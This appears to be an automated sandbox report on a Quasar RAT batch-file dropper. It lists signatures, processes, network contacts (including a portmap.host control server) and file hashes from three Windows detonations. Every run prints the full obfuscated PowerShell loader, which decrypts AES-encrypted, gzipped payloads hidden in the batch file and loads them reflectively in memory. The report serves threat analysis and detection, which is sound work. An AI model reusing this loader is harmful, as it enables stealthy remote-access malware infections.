Analysis Overview
SHA256
2f878f17890e54a4592aa7b9cd78f5b8d44e0254cf85744d94590200bed8d125
Threat Level: Known bad
The file WiKxtRl.bat was found to be: Known bad.
Malicious Activity Summary
Quasar payload
Quasar RAT
Blocklisted process makes network request
Command and Scripting Interpreter: PowerShell
Looks up external IP address via web service
Program crash
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
Runs ping.exe
MITRE ATT&CK Matrix V13
Analysis: static1
Detonation Overview
Reported
2024-06-14 16:07
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-06-14 16:07
Reported
2024-06-14 16:12
Platform
win10-20240404-en
Max time kernel
195s
Max time network
299s
Command Line
Signatures
Quasar RAT
Quasar payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\WiKxtRl.bat"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('BiJkRz5NLnyrmEvcrNKNN2n/+U317Jums9TdEe+oIqA='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XChExx/HLqzULqa7bNx00g=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $Xpngt=New-Object System.IO.MemoryStream(,$param_var); $icfSz=New-Object System.IO.MemoryStream; $ycFeS=New-Object System.IO.Compression.GZipStream($Xpngt, [IO.Compression.CompressionMode]::Decompress); $ycFeS.CopyTo($icfSz); $ycFeS.Dispose(); $Xpngt.Dispose(); $icfSz.Dispose(); $icfSz.ToArray();}function execute_function($param_var,$param2_var){ $JcJYG=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $ChnnI=$JcJYG.EntryPoint; $ChnnI.Invoke($null, $param2_var);}$NlJYy = 'C:\Users\Admin\AppData\Local\Temp\WiKxtRl.bat';$host.UI.RawUI.WindowTitle = $NlJYy;$FnwhD=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($NlJYy).Split([Environment]::NewLine);foreach ($YIwJb in $FnwhD) { if ($YIwJb.StartsWith(':: ')) { $ZiMPy=$YIwJb.Substring(3); break; }}$payloads_var=[string[]]$ZiMPy.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\LtYpwpn6UUqB.bat" "
C:\Windows\SysWOW64\chcp.com
chcp 65001
C:\Windows\SysWOW64\PING.EXE
ping -n 10 localhost
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | runderscore00-37568.portmap.host | udp |
| DE | 193.161.193.99:37568 | runderscore00-37568.portmap.host | tcp |
| US | 8.8.8.8:53 | 1.112.95.208.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 99.193.161.193.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 31.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 174.117.168.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 210.131.50.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
Files
memory/4408-0-0x00000000735FE000-0x00000000735FF000-memory.dmp
memory/4408-3-0x0000000006E10000-0x0000000006E46000-memory.dmp
memory/4408-4-0x00000000735F0000-0x0000000073CDE000-memory.dmp
memory/4408-5-0x0000000007560000-0x0000000007B88000-memory.dmp
memory/4408-6-0x00000000735F0000-0x0000000073CDE000-memory.dmp
memory/4408-7-0x00000000074F0000-0x0000000007512000-memory.dmp
memory/4408-8-0x0000000007C00000-0x0000000007C66000-memory.dmp
memory/4408-9-0x0000000007E50000-0x0000000007EB6000-memory.dmp
memory/4408-10-0x0000000007EC0000-0x0000000008210000-memory.dmp
memory/4408-13-0x0000000007CB0000-0x0000000007CCC000-memory.dmp
memory/4408-14-0x00000000087C0000-0x000000000880B000-memory.dmp
memory/4408-15-0x00000000084F0000-0x0000000008566000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_nmexlbii.2h2.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/4408-26-0x00000000735F0000-0x0000000073CDE000-memory.dmp
memory/4408-31-0x0000000009DB0000-0x000000000A428000-memory.dmp
memory/4408-32-0x0000000009530000-0x000000000954A000-memory.dmp
memory/4408-33-0x0000000009570000-0x0000000009578000-memory.dmp
memory/4408-34-0x0000000009640000-0x00000000096DC000-memory.dmp
memory/4408-35-0x0000000009750000-0x0000000009784000-memory.dmp
memory/4408-36-0x0000000009830000-0x000000000988E000-memory.dmp
memory/4408-37-0x000000000A430000-0x000000000A92E000-memory.dmp
memory/4408-38-0x0000000009970000-0x0000000009A02000-memory.dmp
memory/4408-39-0x0000000007110000-0x0000000007122000-memory.dmp
memory/4408-40-0x0000000009A10000-0x0000000009A4E000-memory.dmp
memory/4408-44-0x0000000009D80000-0x0000000009D8A000-memory.dmp
memory/4408-46-0x00000000735FE000-0x00000000735FF000-memory.dmp
memory/4408-47-0x00000000735F0000-0x0000000073CDE000-memory.dmp
memory/4408-48-0x00000000735F0000-0x0000000073CDE000-memory.dmp
memory/4408-49-0x00000000735F0000-0x0000000073CDE000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\LtYpwpn6UUqB.bat
| MD5 | 97fcb5e52fd298faa4d9f2cc1072f04f |
| SHA1 | ff340234bcca20bf6adb7d3495d123271a23c419 |
| SHA256 | 3ea0e36c3f1dc14e1b8ca5a87dd7b8199b2b1e1bba5048eb5b20847826ac0607 |
| SHA512 | f9ccb47b3279ae8c82bf3fd806d64ddffba993661b0f04263c1683b6dd61963b805916ea3039936998981d2efe686904938480e439052acb314206e299badfcc |
memory/4408-63-0x00000000735F0000-0x0000000073CDE000-memory.dmp
C:\Users\Admin\AppData\Roaming\$sxr-Logs\06-14-~1
| MD5 | 05212a73717f5c10227214c901117e57 |
| SHA1 | 4350277ad82124de0b07a99ac8d82c9f947f0dbe |
| SHA256 | 68a9096ec307c2b583771cdc08fdd7165721ea668f7dab83927314af4710d35a |
| SHA512 | 1f8f094f244d490ec2b01da162ccc98968f42107a60a3cbb067846151ad78170d108dae24d51157ac6406f457ef5b049786be7620bd4c2c8fd277d8978f3da58 |
Analysis: behavioral2
Detonation Overview
Submitted
2024-06-14 16:07
Reported
2024-06-14 16:12
Platform
win10v2004-20240508-en
Max time kernel
262s
Max time network
271s
Command Line
Signatures
Quasar RAT
Quasar payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | api.ipify.org | N/A | N/A |
| N/A | ip-api.com | N/A | N/A |
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3344 wrote to memory of 1520 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
| PID 3344 wrote to memory of 1520 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
| PID 3344 wrote to memory of 1520 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Processes
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\WiKxtRl.bat"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('BiJkRz5NLnyrmEvcrNKNN2n/+U317Jums9TdEe+oIqA='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XChExx/HLqzULqa7bNx00g=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $Xpngt=New-Object System.IO.MemoryStream(,$param_var); $icfSz=New-Object System.IO.MemoryStream; $ycFeS=New-Object System.IO.Compression.GZipStream($Xpngt, [IO.Compression.CompressionMode]::Decompress); $ycFeS.CopyTo($icfSz); $ycFeS.Dispose(); $Xpngt.Dispose(); $icfSz.Dispose(); $icfSz.ToArray();}function execute_function($param_var,$param2_var){ $JcJYG=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $ChnnI=$JcJYG.EntryPoint; $ChnnI.Invoke($null, $param2_var);}$NlJYy = 'C:\Users\Admin\AppData\Local\Temp\WiKxtRl.bat';$host.UI.RawUI.WindowTitle = $NlJYy;$FnwhD=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($NlJYy).Split([Environment]::NewLine);foreach ($YIwJb in $FnwhD) { if ($YIwJb.StartsWith(':: ')) { $ZiMPy=$YIwJb.Substring(3); break; }}$payloads_var=[string[]]$ZiMPy.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 1520 -ip 1520
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1520 -s 2700
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 1520 -ip 1520
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1520 -s 2700
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 8.8.8.8:53 | freegeoip.net | udp |
| US | 8.8.8.8:53 | api.ipify.org | udp |
Files
memory/1520-0-0x00000000751AE000-0x00000000751AF000-memory.dmp
memory/1520-1-0x0000000005140000-0x0000000005176000-memory.dmp
memory/1520-2-0x00000000751A0000-0x0000000075950000-memory.dmp
memory/1520-3-0x00000000057E0000-0x0000000005E08000-memory.dmp
memory/1520-4-0x0000000005E40000-0x0000000005E62000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_emf5awxh.30v.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/1520-6-0x0000000006050000-0x00000000060B6000-memory.dmp
memory/1520-5-0x0000000005FE0000-0x0000000006046000-memory.dmp
memory/1520-16-0x00000000060C0000-0x0000000006414000-memory.dmp
memory/1520-17-0x00000000065A0000-0x00000000065BE000-memory.dmp
memory/1520-18-0x00000000065E0000-0x000000000662C000-memory.dmp
memory/1520-19-0x0000000007DA0000-0x000000000841A000-memory.dmp
memory/1520-20-0x0000000007740000-0x000000000775A000-memory.dmp
memory/1520-21-0x0000000007770000-0x0000000007778000-memory.dmp
memory/1520-22-0x0000000007870000-0x000000000790C000-memory.dmp
memory/1520-23-0x00000000079B0000-0x00000000079E4000-memory.dmp
memory/1520-24-0x00000000079E0000-0x0000000007A3E000-memory.dmp
memory/1520-25-0x00000000089D0000-0x0000000008F74000-memory.dmp
memory/1520-26-0x0000000007B40000-0x0000000007BD2000-memory.dmp
memory/1520-27-0x0000000005420000-0x0000000005432000-memory.dmp
memory/1520-29-0x00000000751AE000-0x00000000751AF000-memory.dmp
memory/1520-30-0x00000000751A0000-0x0000000075950000-memory.dmp
memory/1520-31-0x00000000751A0000-0x0000000075950000-memory.dmp
memory/1520-33-0x00000000751A0000-0x0000000075950000-memory.dmp
Analysis: behavioral3
Detonation Overview
Submitted
2024-06-14 16:07
Reported
2024-06-14 16:12
Platform
win11-20240508-en
Max time kernel
42s
Max time network
52s
Command Line
Signatures
Quasar RAT
Quasar payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
| N/A | api.ipify.org | N/A | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1960 wrote to memory of 864 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
| PID 1960 wrote to memory of 864 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
| PID 1960 wrote to memory of 864 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Processes
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\WiKxtRl.bat"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('BiJkRz5NLnyrmEvcrNKNN2n/+U317Jums9TdEe+oIqA='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XChExx/HLqzULqa7bNx00g=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $Xpngt=New-Object System.IO.MemoryStream(,$param_var); $icfSz=New-Object System.IO.MemoryStream; $ycFeS=New-Object System.IO.Compression.GZipStream($Xpngt, [IO.Compression.CompressionMode]::Decompress); $ycFeS.CopyTo($icfSz); $ycFeS.Dispose(); $Xpngt.Dispose(); $icfSz.Dispose(); $icfSz.ToArray();}function execute_function($param_var,$param2_var){ $JcJYG=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $ChnnI=$JcJYG.EntryPoint; $ChnnI.Invoke($null, $param2_var);}$NlJYy = 'C:\Users\Admin\AppData\Local\Temp\WiKxtRl.bat';$host.UI.RawUI.WindowTitle = $NlJYy;$FnwhD=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($NlJYy).Split([Environment]::NewLine);foreach ($YIwJb in $FnwhD) { if ($YIwJb.StartsWith(':: ')) { $ZiMPy=$YIwJb.Substring(3); break; }}$payloads_var=[string[]]$ZiMPy.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | freegeoip.net | udp |
| US | 8.8.8.8:53 | api.ipify.org | udp |
Files
memory/864-0-0x00000000743DE000-0x00000000743DF000-memory.dmp
memory/864-1-0x00000000048F0000-0x0000000004926000-memory.dmp
memory/864-2-0x0000000005010000-0x000000000563A000-memory.dmp
memory/864-3-0x00000000743D0000-0x0000000074B81000-memory.dmp
memory/864-4-0x00000000743D0000-0x0000000074B81000-memory.dmp
memory/864-5-0x0000000004EB0000-0x0000000004ED2000-memory.dmp
memory/864-6-0x00000000056B0000-0x0000000005716000-memory.dmp
memory/864-7-0x0000000005720000-0x0000000005786000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_mn0x0x2e.eml.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/864-16-0x0000000005790000-0x0000000005AE7000-memory.dmp
memory/864-17-0x0000000005C90000-0x0000000005CAE000-memory.dmp
memory/864-18-0x0000000005CC0000-0x0000000005D0C000-memory.dmp
memory/864-19-0x0000000007480000-0x0000000007AFA000-memory.dmp
memory/864-20-0x0000000006E00000-0x0000000006E1A000-memory.dmp
memory/864-21-0x0000000006E40000-0x0000000006E48000-memory.dmp
memory/864-22-0x0000000006F20000-0x0000000006FBC000-memory.dmp
memory/864-23-0x0000000007050000-0x0000000007084000-memory.dmp
memory/864-24-0x0000000007080000-0x00000000070DE000-memory.dmp
memory/864-25-0x00000000080B0000-0x0000000008656000-memory.dmp
memory/864-26-0x0000000007200000-0x0000000007292000-memory.dmp
memory/864-27-0x0000000004BD0000-0x0000000004BE2000-memory.dmp
memory/864-29-0x00000000743DE000-0x00000000743DF000-memory.dmp
memory/864-30-0x00000000743D0000-0x0000000074B81000-memory.dmp
memory/864-31-0x00000000743D0000-0x0000000074B81000-memory.dmp
memory/864-33-0x0000000007CB0000-0x0000000007CBA000-memory.dmp
memory/864-34-0x00000000743D0000-0x0000000074B81000-memory.dmp
memory/864-37-0x00000000743D0000-0x0000000074B81000-memory.dmp